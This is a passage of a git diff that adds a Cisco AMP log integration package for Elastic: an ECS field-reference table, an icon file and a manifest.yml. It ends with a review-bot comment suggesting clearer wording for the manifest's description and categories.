a unix socket. You should always store the raw address in the `.address` field. Then it should be duplicated to `.ip` or `.domain`, depending on which one it is. | keyword | +| destination.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| destination.as.organization.name | Organization name. | keyword | +| destination.domain | Destination domain. 
| keyword | +| destination.geo.city_name | City name. | keyword | +| destination.geo.continent_name | Name of the continent. | keyword | +| destination.geo.country_iso_code | Country ISO code. | keyword | +| destination.geo.country_name | Country name. | keyword | +| destination.geo.location | Longitude and latitude. | geo_point | +| destination.ip | IP address of the destination (IPv4 or IPv6). | ip | +| destination.port | Port of the destination. | long | +| ecs.version | ECS version this event conforms to. `ecs.version` is a required field and must exist in all events. When querying across multiple indices -- which may conform to slightly different ECS versions -- this field lets integrations adjust to the schema version of the events. | keyword | +| error.message | Error message. | text | +| event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword | +| event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword | +| event.code | Identification code for this event, if one exists. Some event sources use event codes to identify messages unambiguously, regardless of message language or wording adjustments over time. An example of this is the Windows Event ID. | keyword | +| event.dataset | Event dataset | constant_keyword | +| event.id | Unique ID to describe the event. 
| keyword | +| event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date | +| event.module | Event module | constant_keyword | +| event.original | Raw text message of entire event. Used to demonstrate log integrity or where the full log message (before splitting it up in multiple parts) may be required, e.g. for reindex. This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, please see `Field data types` in the `Elasticsearch Reference`. | keyword | +| event.outcome | This is one of four ECS Categorization Fields, and indicates the lowest level in the ECS category hierarchy. `event.outcome` simply denotes whether the event represents a success or a failure from the perspective of the entity that produced the event. Note that when a single transaction is described in multiple events, each event may populate different values of `event.outcome`, according to their perspective. Also note that in the case of a compound event (a single event that contains multiple logical events), this field should be populated with the value that best captures the overall success or failure from the perspective of the event producer. Further note that not all events will have an associated outcome. For example, this field is generally not populated for metric events, events with `event.type:info`, or any events for which an outcome does not make logical sense. | keyword | +| event.severity | The numeric severity of the event according to your event source. 
What the different severity values mean can be different between sources and use cases. It's up to the implementer to make sure severities are consistent across events from the same source. The Syslog severity belongs in `log.syslog.severity.code`. `event.severity` is meant to represent the severity according to the event source (e.g. firewall, IDS). If the event source does not publish its own severity, you may optionally copy the `log.syslog.severity.code` to `event.severity`. | long | +| event.timezone | This field should be populated when the event's timestamp does not include timezone information already (e.g. default Syslog timestamps). It's optional otherwise. Acceptable timezone formats are: a canonical ID (e.g. "Europe/Amsterdam"), abbreviated (e.g. "EST") or an HH:mm differential (e.g. "-05:00"). | keyword | +| file.hash.md5 | MD5 hash. | keyword | +| file.hash.sha1 | SHA1 hash. | keyword | +| file.hash.sha256 | SHA256 hash. | keyword | +| file.name | Name of the file including the extension, without the directory. | keyword | +| file.path | Full path to the file, including the file name. It should include the drive letter, when appropriate. | keyword | +| host.architecture | Operating system architecture. | keyword | +| host.containerized | If the host is a container. | boolean | +| host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | +| host.hostname | Hostname of the host. It normally contains what the `hostname` command returns on the host machine. | keyword | +| host.id | Unique host id. As hostname is not always unique, use values that are meaningful in your environment. Example: The current usage of `beat.name`. | keyword | +| host.ip | Host ip addresses. | ip | +| host.mac | Host mac addresses. | keyword | +| host.name | Name of the host. 
It can contain what `hostname` returns on Unix systems, the fully qualified domain name, or a name specified by the user. The sender decides which value to use. | keyword |
+| host.os.build | OS build information. | keyword |
+| host.os.codename | OS codename, if any. | keyword |
+| host.os.family | OS family (such as redhat, debian, freebsd, windows). | keyword |
+| host.os.kernel | Operating system kernel version as a raw string. | keyword |
+| host.os.name | Operating system name, without the version. | keyword |
+| host.os.platform | Operating system platform (such centos, ubuntu, windows). | keyword |
+| host.os.version | Operating system version as a raw string. | keyword |
+| host.type | Type of host. For Cloud providers this can be the machine type like `t2.medium`. If vm, this could be the container, for example, or other information meaningful in your environment. | keyword |
+| input.type | Type of Filebeat input. | keyword |
+| log.file.path | Full path to the log file this event came from. | keyword |
+| log.flags | Flags for the log file. | keyword |
+| log.offset | Offset of the entry in the log file. | long |
+| log.source.address | Source address from which the log event was read / sent from. | keyword |
+| network.direction | Direction of the network traffic. Recommended values are: \* ingress \* egress \* inbound \* outbound \* internal \* external \* unknown When mapping events from a host-based monitoring context, populate this field from the host's point of view, using the values "ingress" or "egress". When mapping events from a network or perimeter-based monitoring context, populate this field from the point of view of the network perimeter, using the values "inbound", "outbound", "internal" or "external". Note that "internal" is not crossing perimeter boundaries, and is meant to describe communication between two hosts within the perimeter. 
Note also that "external" is meant to describe traffic between two hosts that are external to the perimeter. This could for example be useful for ISPs or VPN service providers. | keyword |
+| network.transport | Same as network.iana_number, but instead using the Keyword name of the transport layer (udp, tcp, ipv6-icmp, etc.) The field value must be normalized to lowercase for querying. See the documentation section "Implementing ECS". | keyword |
+| process.hash.md5 | MD5 hash. | keyword |
+| process.hash.sha1 | SHA1 hash. | keyword |
+| process.hash.sha256 | SHA256 hash. | keyword |
+| process.name | Process name. Sometimes called program name or similar. | keyword |
+| process.pid | Process id. | long |
+| related.hash | All the hashes seen on your event. Populating this field, then using it to search for hashes can help in situations where you're unsure what the hash algorithm is (and therefore which key name to search). | keyword |
+| related.hosts | All hostnames or other host identifiers seen on your event. Example identifiers include FQDNs, domain names, workstation names, or aliases. | keyword |
+| related.ip | All of the IPs seen on your event. | ip |
+| related.user | All the user names or other user identifiers seen on the event. | keyword |
+| source.ip | IP address of the source (IPv4 or IPv6). | ip |
+| source.port | Port of the source. | long |
+| tags | List of keywords used to tag each event. | keyword |
+
diff --git a/packages/cisco_amp/img/cisco.svg b/packages/cisco_amp/img/cisco.svg
new file mode 100644
index 00000000000..20ebebf1974
--- /dev/null
+++ b/packages/cisco_amp/img/cisco.svg
@@ -0,0 +1 @@
+
\ No newline at end of file
diff --git a/packages/cisco_amp/manifest.yml b/packages/cisco_amp/manifest.yml
new file mode 100644
index 00000000000..e601af7c7f9
--- /dev/null
+++ b/packages/cisco_amp/manifest.yml
@@ -0,0 +1,28 @@
+format_version: 1.0.0
+name: cisco_amp
+title: Cisco AMP
+version: 0.0.1
+license: basic
+description: This Elastic integration collects logs from Cisco AMP network devices
+type: integration
+categories:
+  - network
+  - security
+release: experimental
+conditions:
+  kibana.version: "^7.16.0"
+icons:
+  - src: /img/cisco.svg
+    title: cisco
+    size: 216x216
+    type: image/svg+xml
+policy_templates:
+  - name: cisco_amp
+    title: Cisco AMP logs
+    description: Collect logs from Cisco AMP
+    inputs:
+      - type: httpjson
+        title: Collect logs from Cisco AMP API
+        description: Collecting logs from Cisco AMP API
+owner:
+  github: elastic/security-external-integrations
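Review bot: The top-level `description` says the integration collects logs from "Cisco AMP network devices", but the only declared input is `httpjson` with the title "Collect logs from Cisco AMP API", so the sentence misdescribes how data actually arrives; I'd change it to `description: This Elastic integration collects event logs from the Cisco AMP API`. The `- network` entry under `categories` looks questionable for the same reason — if the AMP product covered here is the endpoint one, `security` alone would be the better fit, which is worth confirming against the package-spec category list. The `policy_templates` entry declares no `vars`, so the API host and credential settings presumably live in the data-stream manifest not shown in this hunk; a one-line comment above `inputs:` saying so, e.g. `# API endpoint and credentials are configured in the data stream manifest`, would save readers a search.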